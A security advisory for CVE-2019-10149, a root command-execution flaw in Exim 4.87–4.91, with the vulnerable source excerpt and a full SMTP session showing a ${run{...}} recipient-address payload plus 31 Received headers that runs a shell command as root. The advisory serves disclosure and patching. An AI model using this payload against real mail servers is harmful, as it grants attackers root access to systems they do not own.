ASA-2019-00320 – Exim: Remote command execution (RCE) via recipient address


Allele Security Alert

ASA-2019-00320

Identifier(s)

ASA-2019-00320, CVE-2019-10149

Title

Remote command execution (RCE) via recipient address

Vendor(s)

The Exim Maintainers

Product(s)

Exim

Affected version(s)

Exim versions from 4.87 to 4.91

Fixed version(s)

Exim version 4.92

Proof of concept

Unknown

Description

A flaw was found in the way exim validated recipient address. A remote attacker could use this flaw to execute arbitrary command on the exim server with the permissions of the user running the application.

Technical details

The vulnerable code is located in deliver_message():

6122 #ifndef DISABLE_EVENT
6123 if (process_recipients != RECIP_ACCEPT)
6124 {
6125 uschar * save_local = deliver_localpart;
6126 const uschar * save_domain = deliver_domain;
6127
6128 deliver_localpart = expand_string(
6129 string_sprintf("${local_part:%s}", new->address));
6130 deliver_domain = expand_string(
6131 string_sprintf("${domain:%s}", new->address));
6132
6133 (void) event_raise(event_action,
6134 US"msg:fail:internal", new->message);
6135
6136 deliver_localpart = save_local;
6137 deliver_domain = save_domain;
6138 }
6139 #endif

Because expand_string() recognizes the “${run{<command> <args>}}” expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to “${run{…}}@localhost” (where “localhost” is one of Exim’s local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default):

john@debian:~$ cat /tmp/id
cat: /tmp/id: No such file or directory

john@debian:~$ nc 127.0.0.1 25
220 debian ESMTP Exim 4.89 Thu, 23 May 2019 09:10:41 -0400
HELO localhost
250 debian Hello localhost [127.0.0.1]
MAIL FROM:<>
250 OK
RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31

.
250 OK id=1hTnYa-0000zp-8b
QUIT
221 debian closing connection

john@debian:~$ cat /tmp/id
cat: /tmp/id: Permission denied

root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)

In this example:

– we send more than received_headers_max (30, by default) “Received:” headers to the mail server, to set process_recipients to RECIP_FAIL_LOOP and hence execute the vulnerable code;

– we escape invalid characters in the recipient’s address with backslashes, which are conveniently interpreted by expand_string() (in expand_string_internal() and transport_set_up_command()).

Credits

Qualys Research Labs

Reference(s)

CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit
https://seclists.org/oss-sec/2019/q2/140

CVE-2019-10149 Exim 4.87 to 4.91
https://www.exim.org/static/doc/security/CVE-2019-10149.txt

Fix CVE-2019-10149
https://git.exim.org/exim.git/commit/d740d2111f189760593a303124ff6b9b1f83453d

Exim CVE-2019-10149, how to protect yourself
https://blog.cpanel.com/exim-cve-2019-10149-protect-yourself/

Qualys Security Advisory – The Return of the WIZard: RCE in Exim (CVE-2019-10149)
https://seclists.org/oss-sec/2019/q2/153

CVE-2019-10149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149

CVE-2019-10149
https://nvd.nist.gov/vuln/detail/CVE-2019-10149

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 8, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.